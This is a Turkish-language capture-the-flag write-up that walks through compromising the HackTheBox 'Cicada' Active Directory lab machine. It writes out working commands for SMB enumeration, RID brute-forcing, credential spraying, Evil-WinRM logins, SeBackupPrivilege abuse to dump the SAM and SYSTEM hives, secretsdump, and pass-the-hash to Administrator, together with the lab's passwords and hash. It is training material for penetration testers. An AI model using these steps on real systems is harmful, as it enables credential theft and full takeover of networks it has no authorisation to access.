HackTheBox Cicada Çözümü | Active Directory Saldırı Teknikleri
HackTheBox Cicada Çözümü, Active Directory (AD) saldırılarını öğrenmek ve uygulamak için mükemmel bir eğitim ortamı sunuyor. Bu rehberde, adım adım ilerleyerek, port keşfi, SMB analizi, RID brute-force saldırıları, ve yetki yükseltme gibi temel aşamalarla sistem üzerinde tam kontrol sağlamayı öğreneceksiniz.
Ayrıca, SeBackupPrivilege yetkisinin istismarı, kullanıcı parolalarını ve hash’lerini ele geçirme gibi ileri düzey tekniklerle makinedeki zafiyetlerin nasıl kullanılabileceğini detaylı bir şekilde açıklamaya çalışacağım.
Bu yazııda, hem HackTheBox kullanıcıları hem de Active Directory güvenlik açıklarını anlamak isteyen sızma testi uzmanları için kapsamlı bir kaynak olarak hazırladım. “Active Directory saldırısı nasıl yapılır?” sorusuna cevap arıyorsanız, bu kılavuz tam size göre!
- Makine Oda Linki: Hackthebox
- Makine Zorluğu: Orta
1. Port Tespiti
İlk olarak hedef makine üzerindeki açık portları taradık ve 11 portun açık olduğunu tespit ettik. Tarama sonuçları, makinenin bir Windows sunucusu olduğunu ve aşağıdaki protokolleri çalıştırdığını gösterdi:
- DNS (53)
- Kerberos (88)
- LDAP (389)
- SMB (445)
Bu portların açık olması, hedef makinenin bir Active Directory (AD) ortamında çalıştığını gösterdi.
2. SMB Protokolü Analizi
SMB Keşfi
SMB protokolünü analiz etmek için SMBmap aracını kullandık ve hedef makinedeki paylaşılan diskleri listeledik. Sonuç olarak, yalnızca HR diskine erişim izni olduğunu tespit ettik.
3. HR Diskine Erişim
HR diskine giriş yaparak parola kısmını boş (enter) geçtik ve içerisinde bir Notice from HR.txt dosyasını tespit ettik.
smbclient //10.10.11.35/HR
Bu dosyayı makinemize indirerek inceledik ve içerisinde bir default parola olduğunu gördük.
İlginizi çekebilecek yazımız: Windows 11 Integer Overflow Açığı Hackerların Yetki Yükseltmesine İzin Veriyor
4. Varsayılan Parola Bulma
Dosyanın içeriğinde bir varsayılan parola (default password) bulundu:
Bu parola, sonraki adımlarda Active Directory kullanıcılarını keşfetmek ve test etmek için kullanacağız.
5.Active Directory Saldırılarına Hazırlık
RID Brute-Force ile Kullanıcıları Keşfetme
Hedef sistemdeki kullanıcı hesaplarını bulmak için Crackmapexec aracıyla RID brute-force saldırısı gerçekleştirdik:
crackmapexec smb 10.10.11.35 -u “guest” -p “” –rid-brute
6. Kullanıcıları Tespit Etme Süreci
Bu işlem sonucunda hedef sistemdeki kullanıcılar tespit edildi. Listeyi daha okunabilir hale getirmek için yalnızca kullanıcı bilgilerini filtreledik:
crackmapexec smb 10.10.11.35 -u “guest” -p “” –rid-brute | grep “SidTypeUser”
Keşfedilen kullanıcılar:
- michael.wrightson
- david.orelious
- emily.oscars
- sarah.dantelia
Bu kullanıcıları kullanıcılar.txt oluşturup hepsini içerisine kaydedin.
7.Varsayılan Parolanın Kullanıcısını Tespit Etme
RID brute-force sonucu elde edilen kullanıcıların listesini bir dosyaya kaydettik (kullanıcılar.txt) ve varsayılan parolanın hangi kullanıcıya ait olduğunu test ettik:
crackmapexec smb 10.10.11.35 -u kullanıcılar.txt -p ‘Cicada$M6Corpb*@Lp#nZp!8’
michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
8. Diğer Kullanıcıların Parolalarını Keşfetme
Michael kullanıcısının kimlik bilgileriyle Enum4linux aracını kullanarak diğer kullanıcıların parolalarını tespit etmeye çalıştıyoruz:
enum4linux -a -u michael.wrightson -p ‘Cicada$M6Corpb*@Lp#nZp!8’ 10.10.11.35
david.orelious:aRt$Lp#7t*VQ!3 olarak tespit ettik.
9-DEV Diskine Erişim
Başlangıçta erişilemeyen DEV diskine, david.orelious kullanıcı bilgileriyle giriş yaptık:
smbclient //10.10.11.35/DEV -U ‘david.orelious’
Bu diskte bir Backup.ps1 dosyası bulundu. Dosyayı kendi makinemize indirip inceliyoruz.
10.Emily Kullanıcısının Bilgilerini Tespit Etme
Backup.ps1 dosyasını inceleyerek emily.oscars kullanıcısına ait kimlik bilgilerini tespit ettik:
emily.oscars:Q!3@Lp#M6b*7t*Vt
11. Emily Kullanıcısıyla Sisteme Erişim
Emily kullanıcısının kimlik bilgileriyle Evil-WinRM aracı üzerinden sisteme erişim sağladık:
evil-winrm -u emily.oscars -p ‘Q!3@Lp#M6b*7t*Vt’ -i 10.10.11.35
12- USER.TXT Bayrağını Tespit Etme
Başarılı bir şekilde sisteme giriş yaptıktan sonra masaüstünde ilk bayrağı bulduk.
13. Yetki Yükseltme: SeBackupPrivilege İstismarı
SeBackupPrivilege Yetkisi Nedir?
SeBackupPrivilege, kullanıcının NTFS izinlerini göz ardı ederek sistemdeki hassas dosyalara erişmesine olanak tanır. Bu yetkiyi kullanarak:
- SAM (Security Account Manager) dosyasını ele geçirebiliriz.
- SYSTEM dosyasını alarak SAM dosyasındaki hash’lerin şifresini çözebiliriz.
14.Geçici Bir Dizinin Oluşturulması
İlk olarak, Temp adlı bir klasör oluşturduk:
- cd C:\
- New-Item -Path C:\Temp -ItemType Directory
15.Hassas Dosyaların Kopyalanması
SAM ve SYSTEM dosyalarını Temp klasörüne yedekledik.
- HKLM\SAM: Kullanıcı oturum açma bilgileri ve kimlik doğrulama hashlerini içeren kayıt defteri anahtarıdır.
- HKLM\SYSTEM: SAM dosyasındaki hash’lerin şifresini çözmek için gerekli olan sistem bilgilerini içerir.
- cd C:\Temp
- reg save HKLM\SAM C:\Temp\SAM
16.Dosyaların İndirilmesi
Kopyalanan dosyaları kendi makinemize indirdik:
- download SAM
- download SYSTEM
17.Administrator Hashlerini Ele Geçirme
İndirilen SAM ve SYSTEM dosyalarını Impacket araçları ile analiz ettik. Hash’leri çıkarmak için şu komutu kullandık:
- impacket-secretsdump -sam SAM -system SYSTEM LOCAL
18.Administrator Erişimi
Elde edilen hash ile Administrator hesabına giriş yaptık:
- evil-winrm -u Administrator -H ‘2b87e7c93a3e8a0ea4a581937016f341’ -i 10.10.11.35
Root.txt bayrağını bulduk. Artık tam yetkiyle sistem üzerinde kontrol sağlanmış olduk.
Sonuç
Bu rehberde sırasıyla:
- Port analizi
- SMB keşfi ve HR diskine erişim
- Varsayılan parola analizi
- RID brute-force ile kullanıcı keşfi
- Kullanıcıların parolalarının tespiti
- Yetki yükseltme işlemleri
- Administrator erişimi sağlama adımları gerçekleştirilmiştir.
Bu süreç, bir Active Directory ortamındaki güvenlik açıklarını tespit etmek ve istismar etmek için ideal bir uygulama örneği sunar. HackTheBox Cicada Çözümü yazımızın sonuna geldik.